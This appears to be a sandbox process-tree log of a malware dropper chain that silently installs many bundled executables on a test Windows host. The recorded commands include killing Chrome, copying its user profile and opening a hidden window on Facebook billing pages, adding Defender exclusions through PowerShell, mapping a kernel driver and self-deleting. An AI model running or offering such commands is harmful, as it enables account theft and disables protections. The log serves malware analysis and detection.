C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2980 /prefetch:110⤵PID:12756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2728 /prefetch:110⤵PID:11900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1716 /prefetch:210⤵PID:7188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4040 /prefetch:110⤵PID:8772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:110⤵PID:8552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:110⤵PID:5136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:110⤵PID:10612
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:110⤵PID:8408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=6664 /prefetch:810⤵PID:10216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=6364 /prefetch:810⤵PID:8400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1492 /prefetch:110⤵PID:14100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:110⤵PID:14148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2400 /prefetch:110⤵PID:14064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6760 /prefetch:110⤵PID:13996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:110⤵PID:14072
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6472 /prefetch:110⤵PID:13972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=7188 /prefetch:810⤵PID:14160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=7160 /prefetch:810⤵PID:13604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=7276 /prefetch:810⤵PID:12324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1692,8171214025751244893,686868434604653299,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=7220 /prefetch:210⤵PID:5752
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kaesiheayiq\vict.exe"C:\Users\Admin\AppData\Local\Temp\kaesiheayiq\vict.exe" /VERYSILENT /id=5358⤵PID:8424
-
C:\Users\Admin\AppData\Local\Temp\is-86NKE.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-86NKE.tmp\vict.tmp" /SL5="$F0526,870426,780800,C:\Users\Admin\AppData\Local\Temp\kaesiheayiq\vict.exe" /VERYSILENT /id=5359⤵PID:5268
-
C:\Users\Admin\AppData\Local\Temp\is-FJ3GL.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-FJ3GL.tmp\wimapi.exe" 53510⤵PID:10564
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vas1itpcfen\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\vas1itpcfen\Setup3310.exe" /Verysilent /subid=5778⤵PID:4268
-
C:\Users\Admin\AppData\Local\Temp\is-6NE0T.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-6NE0T.tmp\Setup3310.tmp" /SL5="$9025E,802346,56832,C:\Users\Admin\AppData\Local\Temp\vas1itpcfen\Setup3310.exe" /Verysilent /subid=5779⤵PID:2292
-
C:\Users\Admin\AppData\Local\Temp\is-VLMNA.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-VLMNA.tmp\Setup.exe" /Verysilent10⤵PID:6256
-
C:\Users\Admin\AppData\Local\Temp\is-M74UE.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-M74UE.tmp\Setup.tmp" /SL5="$40732,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-VLMNA.tmp\Setup.exe" /Verysilent11⤵PID:6688
-
C:\Users\Admin\AppData\Local\Temp\is-EIESK.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-EIESK.tmp\PictureLAb.exe" /Verysilent12⤵PID:7004
-
C:\Users\Admin\AppData\Local\Temp\is-7FSUF.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-7FSUF.tmp\PictureLAb.tmp" /SL5="$804EC,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-EIESK.tmp\PictureLAb.exe" /Verysilent13⤵PID:13140
-
C:\Users\Admin\AppData\Local\Temp\is-7JOEJ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-7JOEJ.tmp\Setup.exe" /VERYSILENT14⤵PID:10960
-
C:\Users\Admin\AppData\Local\Temp\is-9B1NJ.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-9B1NJ.tmp\Setup.tmp" /SL5="$507C0,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-7JOEJ.tmp\Setup.exe" /VERYSILENT15⤵PID:12812
-
C:\Users\Admin\AppData\Local\Temp\is-I3APR.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-I3APR.tmp\def.exe" /S /UID=lab21416⤵PID:9452
-
C:\Users\Admin\AppData\Local\Temp\a7-8d5c1-34a-80eb2-e2137229a8a3f\Qiveraxupy.exe"C:\Users\Admin\AppData\Local\Temp\a7-8d5c1-34a-80eb2-e2137229a8a3f\Qiveraxupy.exe"17⤵PID:1020
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qp5ysuxz.y4t\lod.exe & exit18⤵PID:10756
-
C:\Users\Admin\AppData\Local\Temp\qp5ysuxz.y4t\lod.exeC:\Users\Admin\AppData\Local\Temp\qp5ysuxz.y4t\lod.exe19⤵PID:6896
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo HQxchYwhQ20⤵PID:11072
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Riconobbe.xlt20⤵PID:12512
-
C:\Windows\SysWOW64\cmd.execmd21⤵PID:10664
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4fj1ef0g.22v\customer4.exe & exit18⤵PID:13044
-
C:\Users\Admin\AppData\Local\Temp\4fj1ef0g.22v\customer4.exeC:\Users\Admin\AppData\Local\Temp\4fj1ef0g.22v\customer4.exe19⤵PID:6780
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"20⤵PID:6876
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\labhtnvh.ght\askinstall18.exe & exit18⤵PID:13196
-
C:\Users\Admin\AppData\Local\Temp\labhtnvh.ght\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\labhtnvh.ght\askinstall18.exe19⤵PID:9912
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe20⤵PID:10164
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe21⤵
- Kills process with taskkill
PID:7200
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y20⤵PID:12904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/20⤵PID:3588
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc9d706e00,0x7ffc9d706e10,0x7ffc9d706e2021⤵PID:11832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1668,17581887088875345856,6627053059243876805,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1680 /prefetch:821⤵PID:10232
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xzjjxr5h.4gd\md7_7dfj.exe & exit18⤵PID:11876
-
C:\Users\Admin\AppData\Local\Temp\xzjjxr5h.4gd\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\xzjjxr5h.4gd\md7_7dfj.exe19⤵PID:6956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q2vcguzw.y2o\privacytools5.exe & exit18⤵PID:9000
-
C:\Users\Admin\AppData\Local\Temp\q2vcguzw.y2o\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\q2vcguzw.y2o\privacytools5.exe19⤵PID:12992
-
C:\Users\Admin\AppData\Local\Temp\q2vcguzw.y2o\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\q2vcguzw.y2o\privacytools5.exe20⤵PID:10852
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k0hw3ldz.msa\GcleanerWW.exe /mixone & exit18⤵PID:11636
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wqtqn5li.zk0\setup.exe /8-2222 & exit18⤵PID:7656
-
C:\Users\Admin\AppData\Local\Temp\wqtqn5li.zk0\setup.exeC:\Users\Admin\AppData\Local\Temp\wqtqn5li.zk0\setup.exe /8-222219⤵PID:11380
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Rough-Sky"20⤵PID:11788
-
-
C:\Program Files (x86)\Rough-Sky\7za.exe"C:\Program Files (x86)\Rough-Sky\7za.exe" e -p154.61.71.51 winamp-plugins.7z20⤵PID:7220
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Rough-Sky\setup.exe" -map "C:\Program Files (x86)\Rough-Sky\WinmonProcessMonitor.sys""20⤵PID:1408
-
C:\Program Files (x86)\Rough-Sky\setup.exe"C:\Program Files (x86)\Rough-Sky\setup.exe" -map "C:\Program Files (x86)\Rough-Sky\WinmonProcessMonitor.sys"21⤵PID:360
-
-
-
C:\Program Files (x86)\Rough-Sky\7za.exe"C:\Program Files (x86)\Rough-Sky\7za.exe" e -p154.61.71.51 winamp.7z20⤵PID:9988
-
-
C:\Program Files (x86)\Rough-Sky\setup.exe"C:\Program Files (x86)\Rough-Sky\setup.exe" /8-222220⤵PID:14276
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hzo2vtkq.f2b\MultitimerFour.exe & exit18⤵PID:8460
-
C:\Users\Admin\AppData\Local\Temp\hzo2vtkq.f2b\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\hzo2vtkq.f2b\MultitimerFour.exe19⤵PID:11052
-
C:\Users\Admin\AppData\Local\Temp\VLV1SRWZL5\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\VLV1SRWZL5\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10420⤵PID:9060
-
C:\Users\Admin\AppData\Local\Temp\VLV1SRWZL5\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\VLV1SRWZL5\multitimer.exe" 1 3.1615300183.604786570cea4 10421⤵PID:7320
-
C:\Users\Admin\AppData\Local\Temp\VLV1SRWZL5\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\VLV1SRWZL5\multitimer.exe" 2 3.1615300183.604786570cea422⤵PID:8728
-
C:\Users\Admin\AppData\Local\Temp\e5wytgfb5jb\vict.exe"C:\Users\Admin\AppData\Local\Temp\e5wytgfb5jb\vict.exe" /VERYSILENT /id=53523⤵PID:11844
-
C:\Users\Admin\AppData\Local\Temp\is-U0IFU.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-U0IFU.tmp\vict.tmp" /SL5="$709A0,870426,780800,C:\Users\Admin\AppData\Local\Temp\e5wytgfb5jb\vict.exe" /VERYSILENT /id=53524⤵PID:10056
-
C:\Users\Admin\AppData\Local\Temp\is-QMA5S.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-QMA5S.tmp\wimapi.exe" 53525⤵PID:6572
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\dco152shfkk\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\dco152shfkk\askinstall24.exe"23⤵PID:5976
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe24⤵PID:9444
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe25⤵
- Kills process with taskkill
PID:10084
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y24⤵PID:4676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/24⤵PID:7008
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,947696791609105676,1317279928586441402,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1632 /prefetch:825⤵PID:3432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rb54rxzpzqa\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\rb54rxzpzqa\Setup3310.exe" /Verysilent /subid=57723⤵PID:13300
-
C:\Users\Admin\AppData\Local\Temp\is-5ER51.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-5ER51.tmp\Setup3310.tmp" /SL5="$110108,802346,56832,C:\Users\Admin\AppData\Local\Temp\rb54rxzpzqa\Setup3310.exe" /Verysilent /subid=57724⤵PID:13004
-
C:\Users\Admin\AppData\Local\Temp\is-JHR0P.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-JHR0P.tmp\Setup.exe" /Verysilent25⤵PID:11596
-
C:\Users\Admin\AppData\Local\Temp\is-UQE5A.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-UQE5A.tmp\Setup.tmp" /SL5="$30A7E,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-JHR0P.tmp\Setup.exe" /Verysilent26⤵PID:10332
-
C:\Users\Admin\AppData\Local\Temp\is-53BF0.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-53BF0.tmp\PictureLAb.exe" /Verysilent27⤵PID:12576
-
C:\Users\Admin\AppData\Local\Temp\is-7FTM7.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-7FTM7.tmp\PictureLAb.tmp" /SL5="$20D90,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-53BF0.tmp\PictureLAb.exe" /Verysilent28⤵PID:12584
-
C:\Users\Admin\AppData\Local\Temp\is-6E6EA.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-6E6EA.tmp\Setup.exe" /VERYSILENT29⤵PID:12944
-
C:\Users\Admin\AppData\Local\Temp\is-LVGBH.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-LVGBH.tmp\Setup.tmp" /SL5="$10DE8,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-6E6EA.tmp\Setup.exe" /VERYSILENT30⤵PID:11260
-
C:\Users\Admin\AppData\Local\Temp\is-FJ2A4.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-FJ2A4.tmp\def.exe" /S /UID=lab21431⤵PID:13828
-
C:\Users\Admin\AppData\Local\Temp\a6-c6d49-9b0-7d981-f23fa6f32b2d6\Ponasaesucae.exe"C:\Users\Admin\AppData\Local\Temp\a6-c6d49-9b0-7d981-f23fa6f32b2d6\Ponasaesucae.exe"32⤵PID:14044
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\400n2kkc.jaz\customer4.exe & exit33⤵PID:8276
-
C:\Users\Admin\AppData\Local\Temp\400n2kkc.jaz\customer4.exeC:\Users\Admin\AppData\Local\Temp\400n2kkc.jaz\customer4.exe34⤵PID:13792
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"35⤵PID:6812
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ofwt0ws1.twl\askinstall18.exe & exit33⤵PID:14128
-
C:\Users\Admin\AppData\Local\Temp\ofwt0ws1.twl\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\ofwt0ws1.twl\askinstall18.exe34⤵PID:11104
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe35⤵PID:7476
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe36⤵
- Kills process with taskkill
PID:13328
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y35⤵PID:14660
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mz5ez0nv.xzo\md7_7dfj.exe & exit33⤵PID:12228
-
C:\Users\Admin\AppData\Local\Temp\mz5ez0nv.xzo\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\mz5ez0nv.xzo\md7_7dfj.exe34⤵PID:13340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wxpndgxf.2tt\privacytools5.exe & exit33⤵PID:1192
-
C:\Users\Admin\AppData\Local\Temp\wxpndgxf.2tt\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\wxpndgxf.2tt\privacytools5.exe34⤵PID:11632
-
C:\Users\Admin\AppData\Local\Temp\wxpndgxf.2tt\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\wxpndgxf.2tt\privacytools5.exe35⤵PID:12616
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kba50ku3.cy3\GcleanerWW.exe /mixone & exit33⤵PID:7564
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3d4kpfrv.str\setup.exe /8-2222 & exit33⤵PID:8616
-
C:\Users\Admin\AppData\Local\Temp\3d4kpfrv.str\setup.exeC:\Users\Admin\AppData\Local\Temp\3d4kpfrv.str\setup.exe /8-222234⤵PID:6532
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Lingering-Moon"35⤵PID:15828
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4yglvy20.cow\MultitimerFour.exe & exit33⤵PID:13332
-
C:\Users\Admin\AppData\Local\Temp\4yglvy20.cow\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\4yglvy20.cow\MultitimerFour.exe34⤵PID:15264
-
C:\Users\Admin\AppData\Local\Temp\BXY0UTBUZS\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\BXY0UTBUZS\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10435⤵PID:15804
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-53BF0.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-53BF0.tmp\Delta.exe" /Verysilent27⤵PID:11508
-
C:\Users\Admin\AppData\Local\Temp\is-P9HIK.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-P9HIK.tmp\Delta.tmp" /SL5="$30D8C,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-53BF0.tmp\Delta.exe" /Verysilent28⤵PID:7076
-
C:\Users\Admin\AppData\Local\Temp\is-BPR7G.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-BPR7G.tmp\Setup.exe" /VERYSILENT29⤵PID:9240
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-BPR7G.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit30⤵PID:15584
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f31⤵
- Kills process with taskkill
PID:15632
-
-
-
-
-
-
